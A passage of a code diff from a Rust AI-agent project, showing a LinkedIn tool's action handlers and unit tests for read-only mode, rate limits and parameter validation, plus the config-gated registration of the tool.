Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some("Missing required 'post_id' parameter for react".into()),
});
}
};
let reaction_type = match args.get("reaction_type").and_then(|v| v.as_str()) {
Some(rt) if !rt.is_empty() => rt,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'reaction_type' parameter for react".into(),
),
});
}
};
client.add_reaction(post_id, reaction_type).await?;
Ok(ToolResult {
success: true,
output: format!("Reaction '{reaction_type}' added to post {post_id}"),
error: None,
})
}
"delete_post" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'post_id' parameter for delete_post".into(),
),
});
}
};
client.delete_post(post_id).await?;
Ok(ToolResult {
success: true,
output: format!("Post {post_id} deleted successfully"),
error: None,
})
}
"get_engagement" => {
let post_id = match args.get("post_id").and_then(|v| v.as_str()) {
Some(id) if !id.is_empty() => id,
_ => {
return Ok(ToolResult {
success: false,
output: String::new(),
error: Some(
"Missing required 'post_id' parameter for get_engagement".into(),
),
});
}
};
let engagement = client.get_engagement(post_id).await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&engagement)?,
error: None,
})
}
"get_profile" => {
let profile = client.get_profile().await?;
Ok(ToolResult {
success: true,
output: serde_json::to_string(&profile)?,
error: None,
})
}
unknown => Ok(ToolResult {
success: false,
output: String::new(),
error: Some(format!("Unknown action: '{unknown}'")),
}),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::security::AutonomyLevel;
fn test_security(level: AutonomyLevel, max_actions_per_hour: u32) -> Arc<SecurityPolicy> {
Arc::new(SecurityPolicy {
autonomy: level,
max_actions_per_hour,
workspace_dir: std::env::temp_dir(),
..SecurityPolicy::default()
})
}
fn make_tool(level: AutonomyLevel, max_actions: u32) -> LinkedInTool {
LinkedInTool::new(
test_security(level, max_actions),
PathBuf::from("/tmp"),
"202602".to_string(),
LinkedInContentConfig::default(),
LinkedInImageConfig::default(),
)
}
#[test]
fn tool_name() {
let tool = make_tool(AutonomyLevel::Full, 100);
assert_eq!(tool.name(), "linkedin");
}
#[test]
fn tool_description() {
let tool = make_tool(AutonomyLevel::Full, 100);
assert!(!tool.description().is_empty());
assert!(tool.description().contains("LinkedIn"));
}
#[test]
fn parameters_schema_has_required_action() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
assert_eq!(schema["type"], "object");
let required = schema["required"].as_array().unwrap();
assert!(required.contains(&json!("action")));
}
#[test]
fn parameters_schema_has_all_properties() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
let props = &schema["properties"];
assert!(props.get("action").is_some());
assert!(props.get("text").is_some());
assert!(props.get("visibility").is_some());
assert!(props.get("article_url").is_some());
assert!(props.get("article_title").is_some());
assert!(props.get("post_id").is_some());
assert!(props.get("reaction_type").is_some());
assert!(props.get("count").is_some());
assert!(props.get("generate_image").is_some());
assert!(props.get("image_prompt").is_some());
}
#[tokio::test]
async fn write_actions_blocked_in_readonly_mode() {
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
for action in &["create_post", "comment", "react", "delete_post"] {
let result = tool
.execute(json!({
"action": action,
"text": "hello",
"post_id": "urn:li:share:123",
"reaction_type": "LIKE"
}))
.await
.unwrap();
assert!(
!result.success,
"Action '{action}' should be blocked in read-only mode"
);
assert!(
result.error.as_ref().unwrap().contains("read-only"),
"Action '{action}' error should mention read-only"
);
}
}
#[tokio::test]
async fn write_actions_blocked_by_rate_limit() {
let tool = make_tool(AutonomyLevel::Full, 0);
for action in &["create_post", "comment", "react", "delete_post"] {
let result = tool
.execute(json!({
"action": action,
"text": "hello",
"post_id": "urn:li:share:123",
"reaction_type": "LIKE"
}))
.await
.unwrap();
assert!(
!result.success,
"Action '{action}' should be blocked by rate limit"
);
assert!(
result.error.as_ref().unwrap().contains("rate limit"),
"Action '{action}' error should mention rate limit"
);
}
}
#[tokio::test]
async fn read_actions_not_blocked_in_readonly_mode() {
// Read actions skip can_act() but still go through record_action().
// With rate limit > 0, they should pass security checks and only fail
// at the client level (no .env file).
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
for action in &["list_posts", "get_engagement", "get_profile"] {
let result = tool
.execute(json!({
"action": action,
"post_id": "urn:li:share:123"
}))
.await;
// These will fail at the client level (no .env), but they should NOT
// return a read-only security error.
match result {
Ok(r) => {
if !r.success {
assert!(
!r.error.as_ref().unwrap().contains("read-only"),
"Read action '{action}' should not be blocked by read-only mode"
);
}
}
Err(e) => {
// Client-level error (no .env) is expected and acceptable
let msg = e.to_string();
assert!(
!msg.contains("read-only"),
"Read action '{action}' should not be blocked by read-only mode"
);
}
}
}
}
#[tokio::test]
async fn read_actions_blocked_by_rate_limit() {
let tool = make_tool(AutonomyLevel::ReadOnly, 0);
for action in &["list_posts", "get_engagement", "get_profile"] {
let result = tool
.execute(json!({
"action": action,
"post_id": "urn:li:share:123"
}))
.await
.unwrap();
assert!(
!result.success,
"Read action '{action}' should be rate-limited"
);
assert!(
result.error.as_ref().unwrap().contains("rate limit"),
"Read action '{action}' error should mention rate limit"
);
}
}
#[tokio::test]
async fn create_post_requires_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "create_post"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn create_post_rejects_empty_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "create_post", "text": " "}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn article_title_without_url_rejected() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({
"action": "create_post",
"text": "Hello world",
"article_title": "My Article"
}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("article_url"));
}
#[tokio::test]
async fn comment_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "comment", "text": "Nice post!"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn comment_requires_text() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "comment", "post_id": "urn:li:share:123"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("text"));
}
#[tokio::test]
async fn react_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "react", "reaction_type": "LIKE"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn react_requires_reaction_type() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "react", "post_id": "urn:li:share:123"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("reaction_type"));
}
#[tokio::test]
async fn delete_post_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "delete_post"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn get_engagement_requires_post_id() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "get_engagement"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("post_id"));
}
#[tokio::test]
async fn unknown_action_returns_error() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "send_message"}))
.await
.unwrap();
assert!(!result.success);
assert!(result.error.as_ref().unwrap().contains("Unknown action"));
assert!(result.error.as_ref().unwrap().contains("send_message"));
}
#[tokio::test]
async fn get_content_strategy_returns_config() {
let content = LinkedInContentConfig {
rss_feeds: vec!["https://medium.com/feed/tag/rust".into()],
github_users: vec!["rareba".into()],
github_repos: vec!["zeroclaw-labs/zeroclaw".into()],
topics: vec!["cybersecurity".into(), "Rust".into()],
persona: "Security engineer and Rust developer".into(),
instructions: "Write concise posts with hashtags".into(),
};
let tool = LinkedInTool::new(
test_security(AutonomyLevel::Full, 100),
PathBuf::from("/tmp"),
"202602".to_string(),
content,
LinkedInImageConfig::default(),
);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
assert!(result.output.contains("Security engineer"));
assert!(result.output.contains("cybersecurity"));
assert!(result.output.contains("medium.com"));
assert!(result.output.contains("zeroclaw-labs/zeroclaw"));
assert!(result.output.contains("rareba"));
assert!(result.output.contains("Write concise posts"));
}
#[tokio::test]
async fn get_content_strategy_empty_config_shows_hint() {
let tool = make_tool(AutonomyLevel::Full, 100);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
assert!(result.output.contains("No content strategy configured"));
}
#[tokio::test]
async fn get_content_strategy_not_rate_limited_as_write() {
// get_content_strategy is a read action and should work in read-only mode
let tool = make_tool(AutonomyLevel::ReadOnly, 100);
let result = tool
.execute(json!({"action": "get_content_strategy"}))
.await
.unwrap();
assert!(result.success);
}
#[test]
fn parameters_schema_includes_get_content_strategy() {
let tool = make_tool(AutonomyLevel::Full, 100);
let schema = tool.parameters_schema();
let actions = schema["properties"]["action"]["enum"].as_array().unwrap();
assert!(actions.contains(&json!("get_content_strategy")));
}
}
File diff suppressed because it is too large Load Diff
+15
View File
@@ -47,6 +47,8 @@ pub mod hardware_memory_read;
pub mod http_request;
pub mod image_info;
pub mod knowledge_tool;
pub mod linkedin;
pub mod linkedin_client;
pub mod mcp_client;
pub mod mcp_deferred;
pub mod mcp_protocol;
@@ -108,6 +110,7 @@ pub use hardware_memory_read::HardwareMemoryReadTool;
pub use http_request::HttpRequestTool;
pub use image_info::ImageInfoTool;
pub use knowledge_tool::KnowledgeTool;
pub use linkedin::LinkedInTool;
pub use mcp_client::McpRegistry;
pub use mcp_deferred::{ActivatedToolSet, DeferredMcpToolSet};
pub use mcp_tool::McpToolWrapper;
@@ -461,6 +464,17 @@ pub fn all_tools_with_runtime(
tool_arcs.push(Arc::new(ScreenshotTool::new(security.clone())));
tool_arcs.push(Arc::new(ImageInfoTool::new(security.clone())));
// LinkedIn integration (config-gated)
if root_config.linkedin.enabled {
tool_arcs.push(Arc::new(LinkedInTool::new(
security.clone(),
workspace_dir.to_path_buf(),
root_config.linkedin.api_version.clone(),
root_config.linkedin.content.clone(),
root_config.linkedin.image.clone(),
)));
}
if let Some(key) = composio_key {
if !key.is_empty() {
tool_arcs.push(Arc::new(ComposioTool::new(
@@ -562,6 +576,7 @@ pub fn all_tools_with_runtime(
.map(std::path::PathBuf::from),
secrets_encrypt: root_config.secrets.encrypt,
reasoning_enabled: root_config.runtime.reasoning_enabled,
reasoning_effort: root_config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(root_config.provider_timeout_secs),
extra_headers: root_config.extra_headers.clone(),
api_path: root_config.api_path.clone(),
+1
View File
@@ -151,6 +151,7 @@ async fn openai_codex_second_vision_support() -> Result<()> {
zeroclaw_dir: None,
secrets_encrypt: false,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,